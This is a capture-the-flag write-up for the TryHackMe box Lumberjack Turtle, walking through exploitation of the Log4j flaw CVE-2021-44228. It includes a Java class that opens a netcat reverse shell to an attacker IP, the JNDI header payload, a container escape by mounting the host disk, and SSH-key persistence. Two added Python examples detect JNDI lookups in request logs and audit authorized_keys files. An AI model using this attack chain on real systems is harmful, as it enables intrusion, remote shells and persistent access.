No logs, no crime… so says the lumberjack.
Lumberjack Turtle is a TryHackMe box in which Log4j is in the spotlight.
Perfect training for exploiting the CVE-2021-44228 vulnerability.
Command :
nmap -T5 -sV -p- 10.10.239.165
Only port 80 is open. We will enumerate the existing directories on the target with Dirb
Command :
dirb http://10.10.239.165
We have found a first directory; let's see if there is another one underneath it.
Command :
dirb http://10.10.239.165/~logs
A new directory was found: log4j. This is the flaw we will have to exploit. Before getting into it, check whether the target is actually vulnerable.
This GitHub repository lets us test whether the target is vulnerable : https://github.com/fullhunt/log4j-scan
Command :
git clone https://github.com/fullhunt/log4j-scan
cd log4j-scan
pip3 install -r requirements.txt
Target scan :
python3.9 log4j-scan.py http://10.10.239.165/~logs/log4j
It's vulnerable... we suspected as much.
The hint was well hidden, but worth finding: it's in the response headers of the /~logs/log4j page.
In the browser developer tools ( F12 ), we can see the hint: X-THM-HINT CVE-2021-44228 against X-Api-Version
To exploit the flaw, several steps need to be set up.
First clone this GitHub repository
Command :
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests
Setting up the server :
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit
public class Exploit {
    // Static initializer: runs as soon as the class is loaded by the vulnerable JVM
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc 10.11.38.124 9999 -e /bin/bash");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Compile the class (Java 8 target), serve it over HTTP on port 8000 and start the listener :
javac Exploit.java -source 8 -target 8
python3.9 -m http.server
nc -nlvp 9999
Everything is ready !!!! We trigger the lookup through the X-Api-Version header :
curl -X GET http://10.10.239.165/~logs/log4j/ -H 'X-Api-Version: ${jndi:ldap://10.11.38.124:1389/Exploit}'
We get a shell, which cannot be upgraded. In any case, we are root, but inside a container.
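From the defender's side, the request above is exactly what should light up in the logs: a JNDI lookup string in a request header, pointing at an outside LDAP server. The following scanner is an added example (not code from the write-up or from any tool it uses). It assumes the reverse proxy in front of the application logs request headers, which the write-up does not state; the sample request records are constructed. For each request it reports which field carried the lookup and the callback host and port, which is what you need to block on egress and to pivot the investigation.

```python
import re
from urllib.parse import urlparse

# A Log4j lookup as it appears in the payload above: ${jndi:ldap://host:port/Class}.
# Log4j treats lookups case-insensitively, so the regex does too.
JNDI_RE = re.compile(r"\$\{\s*jndi:(?P<url>[^}]*)\}", re.IGNORECASE)


def extract_jndi_lookups(value):
    """Return one dict per JNDI lookup found in a header or URL value."""
    hits = []
    for m in JNDI_RE.finditer(value):
        parsed = urlparse(m.group("url").strip())
        try:
            port = parsed.port  # raises ValueError on a non-numeric port
        except ValueError:
            port = None
        hits.append({
            "raw": m.group(0),
            "scheme": parsed.scheme.lower(),
            "host": parsed.hostname,
            "port": port,
        })
    return hits


def scan_request(record):
    """Check the request path and every header of one logged request.

    record = {"client": ..., "method": ..., "path": ..., "headers": {...}}
    Returns a list of findings; an empty list means the request is clean.
    """
    findings = []
    fields = [("path", record.get("path", ""))]
    fields += list(record.get("headers", {}).items())
    for field, value in fields:
        for hit in extract_jndi_lookups(value):
            findings.append({"client": record.get("client"), "field": field, **hit})
    return findings


def scan_requests(records):
    """Scan a batch of logged requests and return all findings."""
    out = []
    for r in records:
        out.extend(scan_request(r))
    return out


# Constructed sample records (not real traffic). The format assumes the proxy
# logs request headers; only the second record carries the lookup from above.
SAMPLE_REQUESTS = [
    {"client": "203.0.113.7", "method": "GET", "path": "/~logs/log4j/",
     "headers": {"User-Agent": "curl/7.81.0", "X-Api-Version": "1.0"}},
    {"client": "203.0.113.9", "method": "GET", "path": "/~logs/log4j/",
     "headers": {"User-Agent": "curl/7.81.0",
                 "X-Api-Version": "${jndi:ldap://10.11.38.124:1389/Exploit}"}},
]

if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"ALERT client={f['client']} field={f['field']} "
              f"callback={f['scheme']}://{f['host']}:{f['port']}")
```

The callback host is the piece worth acting on: the vulnerable JVM has to reach it over LDAP (port 1389 here) and then fetch the class over HTTP, so an egress rule that denies outbound LDAP from application servers stops this particular chain even before the library is patched.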
The 1st flag is at this location: /opt/
As with the Hamlet box (put the link), go to /dev and check which disks are present.
Command :
cd /dev
ls -al | grep disk
Then, we have to mount xvda1.
Command :
mkdir /mnt/xvda1
mount /dev/xvda1 /mnt/xvda1
Once mounted, we have access to the entire system as root.
The 2nd flag is harder to find and easy to miss. You have to look at the folder called «…»
Done !!!
It is also possible to connect over SSH. Once the xvda1 volume is mounted, we can add a public key to the authorized_keys file.
On Kali, create a private/public key pair
Command :
ssh-keygen
Then append the contents of id_rsa.pub :
echo 'key here' >> authorized_keys
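The appended key is the persistence artifact a defender should be baselining. Below is an added example (not from the write-up) that parses an authorized_keys file, computes each entry's SHA256 fingerprint the way ssh-keygen -lf prints it, and reports every entry whose fingerprint is not on a known-good list. The key blobs in the sample files are constructed placeholders rather than real SSH keys; for real entries the blob is the base64 wire-format key and the fingerprint logic is the same.

```python
import base64
import hashlib

# Key-type tokens start with one of these (ssh-ed25519, ssh-rsa,
# ecdsa-sha2-nistp256, sk-ssh-ed25519@openssh.com, ...).
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def key_fingerprint(b64_blob):
    """SHA256 fingerprint of a key blob, in the format ssh-keygen -lf prints."""
    raw = base64.b64decode(b64_blob, validate=True)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Parse authorized_keys text into one entry per non-comment line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split()
        # The key type may be preceded by an options field such as from="...".
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(KEY_TYPE_PREFIXES)), None)
        entry = {"line": lineno, "text": stripped}
        if idx is None or idx + 1 >= len(parts):
            entry["error"] = "no key type / blob found"
            entries.append(entry)
            continue
        entry["options"] = " ".join(parts[:idx])
        entry["type"] = parts[idx]
        entry["comment"] = " ".join(parts[idx + 2:])
        try:
            entry["fingerprint"] = key_fingerprint(parts[idx + 1])
        except ValueError:  # binascii.Error is a ValueError subclass
            entry["error"] = "key blob is not valid base64"
        entries.append(entry)
    return entries


def baseline_fingerprints(text):
    """Fingerprints of every parseable entry in a known-good file."""
    return {e["fingerprint"] for e in parse_authorized_keys(text) if "fingerprint" in e}


def audit_authorized_keys(text, allowed_fingerprints):
    """Return entries not on the allow-list (unparseable ones included).

    An empty list means the observed file matches the baseline."""
    allowed = set(allowed_fingerprints)
    return [e for e in parse_authorized_keys(text)
            if e.get("fingerprint") not in allowed]


# Constructed sample files. The blobs are base64 of placeholder strings,
# not real keys; the structure is that of a real authorized_keys file.
BASELINE_KEYS = """\
# baseline captured when the host was provisioned
ssh-ed25519 Y29uc3RydWN0ZWQta2V5LTE= admin@workstation
"""

OBSERVED_KEYS = """\
ssh-ed25519 Y29uc3RydWN0ZWQta2V5LTE= admin@workstation
# entry appended later, as in the write-up's persistence step
ssh-rsa Y29uc3RydWN0ZWQta2V5LTI= kali
"""

if __name__ == "__main__":
    allowed = baseline_fingerprints(BASELINE_KEYS)
    for e in audit_authorized_keys(OBSERVED_KEYS, allowed):
        print(f"line {e['line']}: unexpected entry "
              f"{e.get('type', '?')} {e.get('fingerprint', e.get('error'))} {e.get('comment', '')}")
```

Run it against the root and service-account authorized_keys files from a mounted image or a live host, and keep the baseline fingerprints in configuration management so a diff of the file itself, not just its mtime, is what raises the alert.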
That’s all folks
Thank you for taking the time to come to the site and read this write-up.
I hope it brought you something and taught you new things.
Feel free to leave a comment or share this article.